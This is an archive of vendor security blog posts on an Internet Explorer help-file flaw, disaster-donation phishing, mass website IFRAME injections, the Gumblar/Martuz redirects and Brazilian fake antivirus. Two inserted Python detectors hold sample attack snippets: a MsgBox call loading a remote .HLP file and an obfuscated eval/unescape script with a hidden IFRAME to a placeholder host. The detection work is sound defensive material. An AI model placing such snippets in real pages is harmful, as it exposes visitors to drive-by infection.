    Author Archive - Roderick Ordoñez (Technical Communications)

    Asking for help in Windows could lead to more trouble.

    A newly discovered vulnerability in Internet Explorer (IE) leverages the ability of a Visual Basic script to invoke an .HLP (Windows Help file format) file, which could give a remote attacker the ability to run arbitrary code on an affected system.

    Visual Basic uses the following syntax to call the MsgBox function, which is used to display message boxes:


    However, if a specially crafted .HLP file is passed as one of these parameters, remote users would be able to run arbitrary code on an affected system. To trigger the vulnerability, some user interaction is needed: the user has to be directed to the page hosting the exploit and press F1 when the message box appears.
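    As a defensive illustration of the pattern described above (added here, not part of the original post), the following Python check scans a page's VBScript blocks for MsgBox calls that supply a help file argument and flags those pointing at a .HLP file on a remote (UNC or URL) path. The sample page and the host name in it are constructed placeholders.

```python
import re

# Constructed sample page: one MsgBox call with a remote help file, one harmless call.
# The UNC host is a placeholder, not a real indicator.
SAMPLE_HTML = r"""
<script language="VBScript">
MsgBox "Press F1 for help", 0, "Support", "\\PLACEHOLDER-HOST\share\help.hlp", 1
</script>
<script language="VBScript">
MsgBox "Saved."
</script>
"""

VBSCRIPT_BLOCK = re.compile(
    r'<script[^>]*(?:language\s*=\s*["\']?vbscript|type\s*=\s*["\']?text/vbscript)[^>]*>(.*?)</script>',
    re.IGNORECASE | re.DOTALL,
)
MSGBOX_CALL = re.compile(r'\bMsgBox\b\s*\(?\s*(.*)', re.IGNORECASE)


def split_args(arg_text):
    """Split a VBScript argument list on commas that are not inside string literals."""
    args, cur, in_str = [], [], False
    for ch in arg_text.strip().rstrip(')'):
        if ch == '"':
            in_str = not in_str
        if ch == ',' and not in_str:
            args.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    args.append(''.join(cur).strip())
    return args


def find_helpfile_msgbox(html):
    """Return one finding per MsgBox call that passes a help file (4th positional argument)."""
    findings = []
    for block in VBSCRIPT_BLOCK.findall(html):
        for line in block.splitlines():
            m = MSGBOX_CALL.search(line)
            if not m:
                continue
            args = split_args(m.group(1))
            if len(args) >= 4:
                helpfile = args[3].strip('"')
                findings.append({
                    "helpfile": helpfile,
                    # UNC share or URL: the help file is fetched from a host the page controls
                    "remote": helpfile.startswith('\\\\') or '://' in helpfile.lower(),
                    "ext_hlp": helpfile.lower().endswith('.hlp'),
                })
    return findings
```

A web proxy or mail gateway can apply the same rule to inbound HTML; a MsgBox call with a remote .HLP argument has no legitimate use on a public web page.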

    The exploit does not affect all versions of Windows. Systems running Windows 2000, Windows XP, and Windows Server 2003 are vulnerable. Those that run Vista, Server 2008, Server 2008 R2, and Windows 7 are not.

    Microsoft is already aware of the issue and has issued the following statement:

    Our teams are working to address the issue and once we complete our investigation, we will take appropriate action to protect customers. This may include releasing an update out of band. We will provide further updates as they become available.

    Microsoft also released a security advisory that details several workarounds for the said vulnerability. For users, the most important advice is simple—do not press the F1 key when prompted by a website.

    Until the official patch is released, however, Trend Micro Deep Security™ can help shield users from this vulnerability and Trend Micro OfficeScan™ users with Intrusion Defense Firewall (IDF) plug-in are also protected from this attack if their systems are updated with the IDF10-009 release and rule number IDF1004019.


    After the earthquake that hit Haiti last January 12, the Internet was flooded with requests for financial donations from all sorts of companies and organizations. It should be noted that not all of these were true to their stated intentions.

    Martin Roesler, Trend Micro Director of Threat Research, warns Internet users to be very careful when clicking links regarding the latest earthquakes in Haiti. “We have already seen fake donation sites, spam, and FAKEAV-related search engine optimization (SEO) poisoning attacks using this event as a social engineering tactic and their number is still increasing. Users who really want to make a donation should ensure that they do so only on trusted sites, that all the security features of their Web browsers are enabled, and that they manually double-check the URLs they are connecting to. Do not trust email messages offering ‘one-click-donation’ or similar services.”


    The spammed message above poses as a call for relief goods and donations supposedly from the UNICEF International Response Fund. It even described the supposed efforts the agency is currently engaging in to assist victims of the recent Haiti earthquake. Unfortunately, however, the link to the supposed donation site was found to lead to a phishing page instead.

    Users searching for information about the event are also at risk of landing on malicious sites due to SEO poisoning. Clicking poisoned links leads to the installation of TROJ_FAKEAV.ZXS, a FAKEAV variant.


    Using tragedies as a social engineering tactic is no longer new to cybercriminals. Natural calamities, celebrity deaths, viral videos, and other controversial stories—just about anything that can create a huge ruckus on the Web—are just some of their staple scam triggers. As such, both the Federal Bureau of Investigation (FBI) and CNET have released articles to make would-be donors aware of these and thereby protect themselves.

    Trend Micro™ Smart Protection Network™ protects users from threats like these in real time by preventing spammed messages from reaching their inboxes, blocking access to identified malicious sites and domains, and detecting and preventing the download of malicious files.


    Aside from Gumblar, another incident of mass website compromise has been seen in the wild lately, and it has raised as much concern as the former. This one starts with the same technique: a malicious IFRAME unknowingly embedded in a legitimate website, injected via JavaScript. The said IFRAME redirects to another IFRAME, which in turn executes obfuscated JavaScript code.

    Once decoded, it tries to connect to URLs to download exploits for several vulnerabilities in order to gain access to the affected user’s system. The obfuscated malicious JavaScript is detected as JS_DROPPER.LOK, while the URLs that trigger the download of the exploits are detected as TROJ_SHELLCOD.HT. Upon successful exploitation, other malicious files are then downloaded, which Trend Micro detects as TROJ_MEDPINCH.B and TROJ_MEDPINCH.A.
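    To show how a site owner might check their own pages for the injection chain described above (a hidden IFRAME plus an obfuscated script block), here is an added Python example that is not part of the original post. The sample page and the redirector host in it are constructed placeholders; the heuristics (zero-size or hidden IFRAMEs, eval/unescape/fromCharCode with long runs of percent-encoded bytes) are assumptions about what such injections typically look like.

```python
import re

# Constructed sample: a legitimate page with an injected hidden IFRAME and an
# obfuscated script. The redirector host is a placeholder, not a real indicator.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="http://PLACEHOLDER-REDIRECTOR.invalid/in.php" width="0" height="0" style="visibility:hidden"></iframe>
<script>
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%27%29'));
</script>
<script>var s = String.fromCharCode(104,116,116,112); document.write(s);</script>
<iframe src="/legit/embed.html" width="300" height="200"></iframe>
</body></html>"""

IFRAME = re.compile(r'<iframe\b([^>]*)>', re.I)
ATTR = re.compile(r'(\w+)\s*=\s*["\']?([^"\'\s>]+)', re.I)
SCRIPT = re.compile(r'<script\b[^>]*>(.*?)</script>', re.I | re.S)


def hidden_iframes(html):
    """Return src values of IFRAMEs that render invisibly (0/1 px or hidden via style)."""
    found = []
    for attrs in IFRAME.findall(html):
        a = {k.lower(): v for k, v in ATTR.findall(attrs)}
        style = a.get('style', '').lower()
        tiny = (a.get('width', '').rstrip('px') in ('0', '1')
                or a.get('height', '').rstrip('px') in ('0', '1'))
        if tiny or 'display:none' in style or 'visibility:hidden' in style:
            found.append(a.get('src', ''))
    return found


def obfuscation_score(script):
    """Crude score: dynamic evaluation plus long percent-encoded runs are the usual signs."""
    score = 0
    if re.search(r'\beval\s*\(', script): score += 2
    if re.search(r'\bunescape\s*\(', script): score += 1
    if re.search(r'\bfromCharCode\s*\(', script): score += 1
    if re.search(r'\bdocument\.write\s*\(', script): score += 1
    if len(re.findall(r'%[0-9a-fA-F]{2}', script)) >= 16: score += 2
    return score


def suspicious_scripts(html, threshold=3):
    """Return the leading text of each script block scoring at or above the threshold."""
    return [s.strip()[:60] for s in SCRIPT.findall(html) if obfuscation_score(s) >= threshold]
```

Running both checks over every page on a site after a suspected compromise gives a quick list of files to inspect; the scoring threshold trades false positives against missed, lightly obfuscated injections.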

    TROJ_MEDPINCH.B connects to other URLs to download info-stealers SPYW_IEWATCHER and TSPY_LDPINCH.CBS. On the other hand, TROJ_MEDPINCH.A drops yet another info-stealer: TSPY_LDPINCH.ASG. TSPY_LDPINCH.ASG steals user names, passwords, and other account and installation information of the following applications:

    • INETCOMM Server
    • Microsoft Outlook
    • Mirabilis ICQ
    • Opera Software
    • The Bat!
    • Total Commander
    • Trillian

    Though this compromise occurred within days of Gumblar’s last attack, no mention of the Gumblar.{BLOCKED} domain appears in the code. This attack may indeed be separate from Gumblar, or possibly inspired by it. Related URLs are already blocked by the Smart Protection Network, but users are highly advised to patch their systems to minimize the chances of exploitation through the following updates:


    Gumblar.{BLOCKED}, the domain to which visitors of reported compromised websites were directed, was taken down, only to be replaced by a new one: Martuz.{BLOCKED}.

    In an attack which quickly garnered much attention in the security industry, compromised websites were found to redirect visitors to Martuz.{BLOCKED}, which leads to the download of a file onto users’ systems. It then uses Adobe PDF and Flash Player vulnerabilities to gain system access. Once installed, the malware is able to steal stored passwords, which it delivers back to its creators via FTP. These stolen passwords may ultimately lead to the unauthorized tampering of the user’s web server files, wherein obfuscated JavaScript is inserted into several files. The vandalized pages containing the JavaScript then become the malware author’s newest redirectors, continuing the vicious cycle of information stealing. Additionally, the malicious file poisons the results of Google searches conducted by the user of the affected system, thus leading them to more malicious domains.

    Our engineers are still in the process of analyzing the said malicious file. In the meantime, Trend Micro detects the redirecting scripts as HTML_JSREDIR.AE and HTML_REDIR.AC. Injected scripts vary for each infected page, and the exact epicenter of the attack is still yet to be determined.

    Using a browser other than Internet Explorer may help minimize the risk of getting infected, and updating software to address vulnerabilities is a must. Site owners should do an immediate cleanup if an infection is detected, and passwords should be changed as soon as possible.


    Fake/rogue antivirus strikes again, this time targeting users in Brazil. In keeping with today’s malware trends, it did not come alone.

    It initially starts with a spam message:

    Hello, I am sending you my invitation to the graduation location, date and time

    Hello, I am sending you my invitation to the graduation location, date and time.
    I count on your presence.
    We are there,
    Abraços …

    ConviteFormatura.pps (52KB)

    The malware gets installed once the user opens the attachment, which leads to the malfunction of several executables in the system. The malware is also able to disrupt the normal functions of the Windows shell, consequently making it difficult to open folders.

    Attempts to open files created in the programs affected by this malware result in the display of a fancy error message reassuring the user that there is a solution to the error being experienced. Clicking the said message’s [Click here] button brings the user to the Brazilian site Byte Clark, which offers yet another fake antivirus by the same name. Users are then advised to purchase the program to restore the system (a routine which therefore qualifies this as ransomware).

    Trend Micro detects the fake antivirus as TROJ_FAKEAV.BBH. Running the program only removes the files added by the original malicious attachment. It is also able to collect specific data from the user’s computer and send it to a predefined email address.

    Spam is a common delivery vehicle for malware, not just being limited to rogue antivirus. And as usual, people behind this scam rely on the user’s panic to look for a quick solution. As spammers/scammers use more pleasant/kinder wordings to get their message across, users are advised to exercise caution.

    Users under the Smart Protection Network are already protected against this threat.



    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice